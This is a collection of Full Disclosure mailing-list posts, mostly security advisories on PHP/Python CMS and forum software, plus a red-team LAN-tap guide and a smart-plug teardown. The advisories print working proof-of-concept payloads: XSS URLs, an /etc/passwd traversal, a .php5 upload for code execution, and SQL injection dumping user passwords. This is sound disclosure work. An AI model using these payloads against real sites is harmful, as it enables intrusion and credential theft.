fields Name, Address, Address 2, City, Title, Company, or About, or the Title, Menu Title, Window Title, Description, or Keyword of a page. Proof of Concept: The comparison page can for example be seen here: http://localhost/admin/ compare?id=8¤t=no Persistent XSS: Page & Content Block CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N The title of a new webpage is echoed unencoded, leading to persistent XSS. The same issue also exists when creating blocks. A user account with the right to create pages is required. By default, the editor role has this right. Proof of Concept: Create a new page or block, as title use: The payload will be echoed in a title tag as well as a h1 tag when viewing the page and when editing the page. Persistent XSS: Blog Post CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N The title as well as the tags of a blog post are echoed unencoded, leading to persistent XSS. A user account with the right to create pages is required. By default, the editor role has this right Proof of Concept: Create a new blog post, as title and tag use: '"> The payload will be echoed in a title tag, a h1 tag, as well as a href tag when viewing the page and when editing the page. Reflected XSS CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N The name parameter of the custom fields component is vulnerable to reflected XSS. Proof of Concept: GET /admin/extended?extends=User&name=%3Cimg%20src=no%20onerror=alert(1)%3E HTTP/1.1 4. Solution To mitigate this issue please upgrade at least to version 1.3.13. Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue, Vendor announces fix 11/07/2016 Asked Vendor if recent releases fixes issues, Vendor confirmed 02/02/2017 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Elefant-CMS-1312-RC-Multiple-Persistent-and-Reflected-XSS-191.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Tap 'n' Sniff
Content Table 1. Introduction 2. Failsafe mode 3. Installing Openwrt 4. Configuring Openwrt 5. Testing 1. Introduction The goal of this guide is to provide a reliable and fast way for creating a lan tap for red team assessments of networks. While this was our main target this tap is also quite helpful if you want to have a great device for your daily analysis of network attached computers. Before we started with our implementation we made a list of things which were mandatory. The hardware had to be small, have at least two lan ports and wifi, cheap and opensource included or available. After some research we choose the TL-WR810N, a 20 euro Pocket Router which should be available in most electronic stores. It features two lan ports and a wifi card, which allows us to bridge the lan interfaces and create a hidden AP to connect to the device. It should be said that the device only supports Fastlan (100 Mbit/sec) and not Gigabit lan (1000 Mbit/sec) but at this size you can't be picky and it's quite difficult to find something better even online when ordering from a foreign country so there is that. After we are finished we want to be able to listen to the network traffic between the taped sources, manipulate packets or directly pivot into the network. For our setup we are going to use openwrt instead of the default TP-Link firmware. We are currently working on creating an image that will make the configuration of openwrt obsolete so stay tuned for info regarding this. And this is how it actually looks: [wr810n_front] [wr810n_back] [wr810n_ports] [wr810n_led_switch] On the inside we find a SoC (System on Chip), namely the Qualcomm Atheros QCA9533 which is capable of wireless ABGN communication and has a clock speed of 560 MHz according to wikidevi. There is also 64 MB of Ram and we can use 4.6 MB of flash storage with 1.1 still availiable after finishing this guide. Below is the output of cpuinfo, free and df. It is interesting that when we opened the device later on we actually found the cpu to be a different one, the Qualcom QCA9531-BL3A but apparently they are identical. Basic information found via commandline: root@OpenWrt:~# cat /proc/cpuinfo system type : Qualcomm Atheros QCA9533 ver 2 rev 0 machine : TP-LINK TL-WR810N processor : 0 cpu model : MIPS 24Kc V7.4 BogoMIPS : 432.53 wait instruction : yes microsecond timers : yes tlb_entries : 16 extra interrupt vector : yes hardware watchpoint : yes, count: 4, address/ irw mask: [0x0ffc, 0x0ffc, 0x0ffb, 0x0ffb] isa : mips1 mips2 mips32r1 mips32r2 ASEs implemented : mips16 shadow register sets : 1 kscratch registers : 0 package : 0 core : 0 VCED exceptions : not available VCEI exceptions : not available root@OpenWrt:~# free total used free shared buffers cached Mem: 60220 17032 43188 20 1504 4828 -/+ buffers/cache: 10700 49520 Swap: 0 0 0 root@OpenWrt:~# df -h -T Filesystem Type Size Used Available Use% Mounted on /dev/root squashfs 2.0M 2.0M 0 100% /rom tmpfs tmpfs 29.4M 20.0K 29.4M 0% /tmp /dev/mtdblock3 jffs2 4.6M 3.5M 1.1M 76% / overlay overlayfs:/overlay overlay 4.6M 3.5M 1.1M 76% / tmpfs tmpfs 512.0K 0 512.0K 0% /dev 2. Failsafe mode Before we begin you should know about the built-in failsafe mode of openwrt. This exists just in case you make a mistake and loose the connection to the router by something else than a reboot. It is activated by pressing the reset button rapidly on startup till the led blinks more frequently than usual. Now you have to give your ethernet interface an ip like 192.168.1.2 and connect to the WAN/LAN port. Then you should be able to ssh to 192.168.1.1 as root without password. In the ssh session you can mount the filesystem with mount_root and reverse the changes that made your system fail. If the worst-case scenario happens and you have no clue why your system behaves abnormal, you can always reinstall openwrt. To do so, we copy our image via scp in the tmp directory of the router: scp /path/to/image/ root@192.168.1.1:/tmp Now we use the sysupgrade command on the router to install the bin file: sysupgrade -n /tmp/binary The -n flag means that we also erase all config files. Don't worry if you loose the connection, first the router will reboot and then you have to switch your lan cable to the lan port again. 3. Installing Openwrt Installing openwrt is as easy as it gets, you just have to configure the router, preferrably by connecting via lan, using its webinterface and download the respective firmware image from the Openwrt wiki. We used the EU Version 1.1, also availible at our github(TODO) since we can't guarantee this procedure to work with other versions that might be published in the future. The easiest way to install openwrt is via the webinterface and its option Firmware-Upgrade. Íf, for whatever reason, this fails you can also install openwrt via the serial console or TFTP. A guide can be found at the wiki. After doing so, you will loose the connection to the ro
[FD] The HS-110 Smart Plug aka Projekt Kasa
Content Table 1. Introduction 2. The Firmware 3. The Android Application 4. The Problems 5. Conclusion 6. Appendix 6.1. Excursion Dalvik 6.2 Control script 1. Introduction The HS-110 is a Smart Plug meaning it is capable of being controlled with commands via a network. TP-Link released a mobile application called "Kasa for Mobile" for Android and iOS devices to control the Smart Plug. The possibilities range from simple tasks like turning the Plug on and off to advanced options like planing schedules and timers. The HS-110 additionally has the possibility to measure and store data regarding power consumption. These are screenshots of the app home screen, the main control and the settings for a plug: app control screen plug control screen plug settings The device itself is pretty straightforward with only two buttons. The one at the top is the reset button and the other one in the front is the power button and status led: plug from the front plug from the top plug from the back To open it we remove the hidden screw under the information sheet and then break it open using a little bit of force: [open1] [open2] Now we remove the top part of the board and the two screws on the second part to get rid of the plastic hull: [open3] [open4] [open5] We can now see the Atheros AR9331 (Hornet) on the right board in the middle picture above. It is a System-on-a-Chip (SOC) which has a MIPS 24K processor and is a full featured IEEE 802.11n 1x1 AP/Router. It also has a 32 MiB RAM (Zentel A3S56D40GTP-50l) on the opposite side of the same board. The other board hosts the electronics for the actual plug. But the interesting question is: What this SOC is actually running so let's move on to the next section. 2. The Firmware The Smart Plug runs on a 64-bit Linux (2.6.31). The Firmware is available at the Website of TP-Link. Our version is 1.0.7. There is also an unofficial unstable API on GitHub. For a first analysis of the Firmware we used binwalk . It is important to also install sasquatch for this since unsquashfs appears to have issues with TP-Link firmware. You can just install the necessary tools for the installation of sasquatch via apt sudo apt-get install build-essential liblzma-dev liblzo2-dev zlib1g-dev or the corresponding packages if you don't use apt. After that just clone the sasquatch git repository and run the build script. At the end we have to install binwalk by cloning it's git repository and running the setup.py script via sudo python setup.py install or sudo python3 setup.py install if you are using python3.x. For the dependencies we can run deps.sh, at least when we are using apt. Otherwise you have to install them by yourself. A list is available at github . Now we are ready to run binwalk at the firmware with following command: root@kali:~/Desktop/test# binwalk hs110v1_us_1.0.7_Build_151016_Rel.24186.bin DECIMAL HEXADECIMAL DESCRIPTION 15904 0x3E20 U-Boot version string, "U-Boot 1.1.4 (Oct 16 2015 - 11:22:22)" 15952 0x3E50 CRC32 polynomial table, big endian 17244 0x435C uImage header, header size: 64 bytes, header CRC: 0xA2B5F4E6, created: 2015-10-16 03:22:22, image size: 38777 bytes, Data Address: 0x8001, Entry Point: 0x8001, data CRC: 0xFED80D4A, OS: Linux, CPU: MIPS, image type: Firmware Image, compression type: lzma, image name: "u-boot image" 17308 0x439C LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 112564 bytes 66240 0x102C0 uImage header, header size: 64 bytes, header CRC: 0x4D2B83AC, created: 2015-10-16 03:22:56, image size: 772570 bytes, Data Address: 0x80002000, Entry Point: 0x8019BF90, data CRC: 0xC849B1ED, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: "Linux Kernel Image" 66304 0x10300 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 2238780 bytes 1114816 0x1102C0 Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2112689 bytes, 194 inodes, blocksize: 16384 bytes, created: 2015-10-16 03:25:36 It is the most basic command of binwalk and only tells it to analyze the specified file. As we can see binwalk detects quite a few things. First of all there is the U-Boot version string and -image header together with its lzma archive and the polynomial table. U-Boot is a common bootloader, as we can see it was created on October 16th 2015 at 11 o'clock but it is out of our scope to go through it. Next thing we notice is the Kernel header and archive which is a little bit more interesting but we are still looking for the actual system which is the last entry, the squashfs filesystem, compressed with lzma. Now we could extract the squashfs filesystem via dd but we can also modify our command with the argument -e to let binwalk do this. The e argument is the command to extract the firmware using predefined dd rules. The output should look like
[FD] FUDforum 3.0.6: LFI
Security Advisory - Curesec Research Team 1. Introduction Affected Product:FUDforum 3.0.6 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://fudforum.org/forum/ Vulnerability Type: LFI Remote Exploitable: Yes Reported to vendor: 04/11/2016 Disclosed to public: 11/10/2016 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials are required. 3. Details CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N Description: The "file" parameter of the hlplist.php script is vulnerable to directory traversal, which allows the viewing of arbitrary files. Proof of Concept: http://localhost/fudforum/adm/hlplist.php?tname=default&tlang=./af&&SQ= 4b181ea1d2d40977c7ffddb8a48a4724&file=../../../../../../../../../../etc/passwd 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 04/11/2016 Informed Vendor about Issue (no reply) 09/14/2016 Reminded Vendor (no reply) 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/FUDforum-306-LFI-167.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Jaws 1.1.1: Object Injection, Open Redirect, Cookie Flags
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Jaws 1.1.1 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://jaws-project.com/ Vulnerability Type: Object Injection, Open Redirect, Cookie Flags Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to public: 11/10/2016 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Jaws is a content management system written in PHP. In version 1.1.1, it is vulnerable to various low to medium impact issues. It contains an Object Injection, which does not seem to be currently exploitable without custom changes made by users; its session cookies are not set to httpOnly, which may make it easier to exploit XSS issues; and it contains an Open Redirect issue. 3. Details Open Redirect / Phishing After a login is performed, a user is redirected to a website defined in the URL, which may be exploited in phishing attacks. Note that the redirect only works if the user was not logged in previously, and then only after a login is performed. Proof of Concept: http://localhost/jaws-complete-1.1.1/index.php/users/login/referrer/ 687474703a2f2f6578616d706c652e636f6d.html 687474703a2f2f6578616d706c652e636f6d is the result of a hex2bin call. Object Injection All parameters passed to the application are passed to unserialize, making the application vulnerable to Object Injection. Currently, there does not seem to be code that can be exploited via Object Injection, but this may change in the future, or users may have custom code which isn't in itself vulnerable, but would result in vulnerable code in combination with this issue. Proof of Concept: All values passed to the application are vulnerable, for example a cookie: GET /jaws-complete-1.1.1/admin.php?checksess HTTP/1.1 Host: localhost Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: JAWSSESSID=O:{}; Connection: close Cache-Control: max-age=0 Cookie Flags The JAWSSESSID cookie does not have the httpOnly flag set, making it slightly easier to exploit XSS vulnerabilities. 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/05/2016 Informed Vendor about Issue (no reply) 09/15/2016 Reminded Vendor of Disclosure Date (no reply) 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Jaws-111-Object-Injection-Open-Redirect-Cookie-Flags-168.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] FUDforum 3.0.6: Multiple Persistent XSS & Login CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product:FUDforum 3.0.6 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://fudforum.org/forum/ Vulnerability Type: XSS, Login CSRF Remote Exploitable: Yes Reported to vendor: 04/11/2016 Disclosed to public: 11/10/2016 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable to multiple persistent XSS issues. This allows an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection. Additionally, FUDforum is vulnerable to Login-CSRF. 3. Details XSS 1: Via Filename in Private Message CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description: The filename of attached images in private messages is vulnerable to persistent XSS. Proof of Concept: Send a PM to a user. Add an attachment, where the filename is: '">.jpg When the recipient views the PM, the injected code will be executed. XSS 2: Via Filename in Forum Posts CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description: The filename of attached images in forum posts is vulnerable to persistent XSS. Proof of Concept: Create a new forum post. Add an attachment, where the filename is: '">.jpg When viewing the post the injected code will be executed. XSS 3: Via Signature in User Profile CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description: When editing a profile, the signature is echoed unencoded, leading to persistent XSS. Proof of Concept: Visit http://localhost/fudforum/index.php?t=register as signature, use '"> The injected code is either executed when the user themselves edits their profile - which may be exploited via login CSRF - or when an admin visits the edit profile page located here: http:// localhost/fudforum/index.php?t=register&mod_id=6&&SQ= 1a85a858f326ec6602cb6d78d698f60a Login CSRF CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N Description: The login of FUDForum does not have any CSRF protection. The impact of this is low, but an attacker might get a victim to disclose sensitive information by using CSRF to log the victim into an attacker-controlled account. An example would be the accidental sending of a sensitive private message while being logged into an account controlled by an attacker. Additionally, Login-CSRF may enable an attacker to exploit XSS issues in the user area. Proof of Concept: http://localhost/fudforum/index.php?t=login"; method ="POST"> 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 04/11/2016 Informed Vendor about Issue (no reply) 09/14/2016 Reminded Vendor (no reply) 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/FUDforum-306-Multiple-Persistent-XSS-amp-Login-CSRF-169.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Jaws 1.1.1: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Jaws 1.1.1 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://jaws-project.com/ Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to public: 11/10/2016 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Jaws is a content management system written in PHP. In version 1.1.1, it is vulnerable to code execution as it allows the upload of files with a dangerous type. An account with extended privileges is required. 3. Details CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C The file manager forbids the uploading of most PHP and htaccess files by checking the extension of uploaded files and renaming files when required. However, the check can be bypassed by an attacker as the file extension .pht - which is treated as PHP file by default Apache installations - is not filtered. An account with access to the file manager is required. 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/05/2016 Informed Vendor about Issue (no reply) 09/15/2016 Reminded Vendor of Disclosure Date (no reply) 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Jaws-111-Code-Execution-170.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Lepton 2.2.2: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product: LEPTON 2.2.2 stable Fixed in: 2.3.0 Fixed Version Link: http://www.lepton-cms.org/posts/ important-lepton-2.3.0-101.php Vendor Website: http://www.lepton-cms.org/ Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to11/10/2016 public: Release mode: Coordinated Release CVE:n/a Credits Tim Coen of Curesec GmbH 2. Overview Lepton is a content management system written in PHP. In version 2.2.2, it is vulnerable to code execution as it is possible to upload files with dangerous type via the media manager. 3. Details Upload of file with dangerous type CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description: When uploading a file in the media tab, there is a client-side as well as a server-side extension check. The server-side check can be bypassed by including a valid extension before the desired extension, leading to code execution or XSS. Proof of Concept: POST /LEPTON_stable_2.2.2/upload/admins/media/index.php?leptoken= 099c871bbf640f2f91d2az1472132032 HTTP/1.1 Host: localhost Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: lep9131sessionid= 8bgkd5rae5nhbn0jaac8jpkpc5 Connection: close Content-Type: multipart/form-data; boundary=---38397165016927337851258279296 Content-Length: 613 -38397165016927337851258279296 Content-Disposition: form-data; name="action" media_upload -38397165016927337851258279296 Content-Disposition: form-data; name="current_dir" -38397165016927337851258279296 Content-Disposition: form-data; name="upload[]"; filename="test.png.php5" Content-Type: image/png http://localhost/ LEPTON_stable_2.2.2/upload/media/test.png.php5?x=id 4. Solution To mitigate this issue please upgrade at least to version 2.3.0: http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue 09/06/2016 Vendor requests 60 days to release fix 10/25/2016 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Lepton-222-Code-Execution-171.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Lepton 2.2.2: CSRF, Open Redirect, Insecure Bruteforce Protection & Password Handling
Security Advisory - Curesec Research Team 1. Introduction Affected Product: LEPTON 2.2.2 stable Fixed in: 2.3.0 Fixed Version http://www.lepton-cms.org/posts/ Link: important-lepton-2.3.0-101.php Vendor Website: http://www.lepton-cms.org/ Vulnerability CSRF, Open Redirect, Insecure Bruteforce Protection & Type: Password Handling RemoteYes Exploitable: Reported to 09/05/2016 vendor: Disclosed to 11/10/2016 public: Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Lepton is a content management system written in PHP. In version 2.2.2, it contains various low to medium impact issues. The functionality that operates on files and folders is vulnerable to CSRF which may lead to XSS, the logout is vulnerable to Open Redirect, the in-build bruteforce protection can be easily bypassed, and passwords are hashed with md5 and send out via email in plaintext. 3. Details CSRF CVSS: Medium 4.0 AV:N/AC:H/Au:N/C:N/I:P/A:P Description: All actions on folders and files are missing CSRF protection. Because of this, an attacker can delete, create, or rename folders and files. An attacker could for example create .html files which would lead to an XSS attack. Proof of Concept: Delete Folder: http://localhost// LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/tiny_mce/filemanager/execute.php? action=delete_folder" method="POST"> Create File: http://localhost//LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/ tiny_mce/filemanager/execute.php?action=create_file" method="POST"> Open Redirect CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:NP Description: The redirect parameter of the logout script is vulnerable to open redirect. Proof of Concept: http://localhost/LEPTON_stable_2.2.2/upload/account/logout.php?redirect=http:// google.com Insufficient Bruteforce Protection Description: The bruteforce protection works on a per-session base, which is easily bypassed by an attacker by simply requesting a new session by not sending the current, locked session information. The current bruteforce protection may provide a false sense of security and should thus be removed or changed. Code: if($_SESSION['ATTEMPS'] > $this->max_attemps) { $this->warn(); } Password Handling The password reset functionality sends a newly generated password in plaintext via email, which is not recommended. Additionally, md5 is used for hashing, which is also not recommended. 4. Solution To mitigate this issue please upgrade at least to version 2.3.0: http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue 09/06/2016 Vendor requests 60 days to release fix 10/25/2016 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Lepton-222-CSRF-Open-Redirect-Insecure-Bruteforce-Protection-amp-Password-Handling-172.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Lepton 2.2.2: SQL Injection
Security Advisory - Curesec Research Team 1. Introduction Affected Product: LEPTON 2.2.2 stable Fixed in: 2.3.0 Fixed Version Link: http://www.lepton-cms.org/posts/ important-lepton-2.3.0-101.php Vendor Website: http://www.lepton-cms.org/ Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to11/10/2016 public: Release mode: Coordinated Release CVE:n/a Credits Tim Coen of Curesec GmbH 2. Overview Lepton is a content management system written in PHP. In version 2.2.2, it is vulnerable to multiple SQL injections. The injections require a user account with elevated privileges. 3. Details SQL Injection: Search Page CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description: The "terms" parameter of the page search is vulnerable to SQL Injection. A user account with the right "Pages" is required to access this feature. Proof of Concept: POST /LEPTON_stable_2.2.2/upload/admins/pages/index.php?leptoken= 3f7020b05ec343675b6b2z1472137594 HTTP/1.1 Host: localhost Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID= fkb7do1domiofuavvof5qbsv66; lep8765sessionid=f3a67s8kh379l9bs2rkggtpt12 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 154 search_scope=title&terms=" union select username,2,3,4,5,6,password,email,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from lep_users -- -&search=Search Blind or Error-based SQL Injection: Create Page CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description: The "parent" parameter of the create page functionality is vulnerable to SQL Injection. A user account with the right "Pages" is required to access this feature. The injection is blind or error based in the case that PHP is configured to show errors. Proof of Concept: POST /LEPTON_stable_2.2.2/upload/admins/pages/add.php?leptoken= dbbbe0a5cca5d279f7cd2z1472142328 HTTP/1.1 Host: localhost Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID= fkb7do1domiofuavvof5qbsv66; lep8765sessionid=uniltg734soq583l03clr0t6j0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 84 title=test&type=wysiwyg&parent=0 union select version()& visibility=public&submit=Add Blind or Error-based SQL Injection: Add Droplet CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description: The "Add_droplets" parameter of the droplet permission manager is vulnerable to SQL injection. A user account with access to the Droplets administration tool is required. The injection is blind or error based in the case that PHP is configured to show errors. Proof of Concept: POST /LEPTON_stable_2.2.2/upload/admins/admintools/tool.php?tool=droplets& leptoken=1eed21e683f216dbc9dc2z1472139075 HTTP/1.1 Host: localhost Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid= f3a67s8kh379l9bs2rkggtpt12 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 277 tool= droplets&perms=1&Add_droplets%5B%5D=1&Add_droplets%5B%5D=2' WHERE attribute= 'Add_droplets' or extractvalue(1,version())%23&Delete_droplets%5B%5D=1& Export_droplets%5B%5D=1&Import_droplets%5B%5D=1&Manage_backups%5B%5D=1& Manage_perms%5B%5D=1&Modify_droplets%5B%5D=1&save=Save 4. Solution To mitigate this issue please upgrade at least to version 2.3.0: http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue 09/06/2016 Vendor requests 60 days to release fix 10/25/2016 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Lepton-222-SQL-Injection-173.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] MoinMoin 1.9.8: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:MoinMoin 1.9.8 Fixed in:1.9.9 Fixed Version Link: http://static.moinmo.in/files/moin-1.9.9.tar.gz Vendor Website: https://moinmo.in Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to public: 11/10/2016 Release mode:Coordinated Release CVE: CVE-2016-7148, CVE-2016-7146 Credits Tim Coen of Curesec GmbH 2. Overview MoinMoin is an open source Wiki application written in python. In version 1.9.8, it is vulnerable to two persistent XSS issues. This allows an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection. 3. Details XSS 1: Persistent XSS (CVE-2016-7148) CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description: A page name is echoed in the attach file page without encoding, leading to persistent XSS. Proof of Concept: To place the payload create a new page which contains the payload as name by visiting: http://localhost:9090/ newtest%27%22%3E%3Cimg%20src%3Dno%20onerror%3Dalert%287%29%3E?action=edit To trigger the payload visit the attach file page: http://localhost:9090/ newtest%27%22%3E%3Cimg%20src%3Dno%20onerror%3Dalert%287%29%3E?action=AttachFile Note that there must be at least one existing attachment. XSS 2: Persistent XSS (CVE-2016-7146) CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description: The GUI editor is vulnerable to XSS via a specifically crafted URL, as it echoes part of the URL without encoding in two different places. The issue can be exploited reflected or persistent. Proof of Concept: Reflected example (the page does not have to exist): http://localhost:9090/'"> ?action=fckdialog&dialog=attachment Alternatively, an attacker can create a page containing the payload: http://localhost:9090/ newtestfoo'%22%3E%3Cimg%20src=no%20onerror=alert(1)%3E The payload is triggered when attaching a file via the the GUI editor ("Edit (GUI)" -> "Attachment"). 4. Solution To mitigate this issue please upgrade at least to version 1.9.9: http://static.moinmo.in/files/moin-1.9.9.tar.gz Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Contacted Vendor, Vendor confirmed, Requested CVEs 09/06/2016 CVEs assigned and distributed to vendor 10/05/2016 Vendor requests more time 10/31/2016 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/MoinMoin-198-XSS-175.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] MyLittleForum 2.3.6.1: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product: MyLittleForum 2.3.6.1 Fixed in: 2.3.7beta Fixed Version Link: https://github.com/ilosuna/mylittleforum/releases/tag/ v2.3.7beta Vendor Website: http://mylittleforum.net/ Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to11/10/2016 public: Release mode: Coordinated Release CVE:n/a Credits Tim Coen of Curesec GmbH 2. Overview MyLittleForum is forum software written in PHP. In version 2.3.6.1, it is vulnerable to cross site request forgery. An attacker could exploit this issue to add new users or change the status of existing users to administrator if a victim visits a website containing a specifically crafted payload while logged into MyLittleForum. 3. Details CVSS: Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P Description: There is no CSRF protection, allowing an attacker to perform actions for a victim if the victim visits an attacker controlled website while logged in. Proof of Concept: Add New User: http://localhost/ mylittleforum-2.3.6.1/index.php" method="POST"> Make Existing User Admin: 4. Solution To mitigate this issue please upgrade at least to version 2.3.7beta: https://github.com/ilosuna/mylittleforum/releases/tag/v2.3.7beta Please note that a newer version might already be available. 5. Report Timeline 09/05/2015 Informed Vendor about Issue (no reply) 09/15/2015 Reminded Vendor of Disclosure Date 09/15/2015 Vendor replies 10/04/2015 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/MyLittleForum-2361-CSRF-176.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team 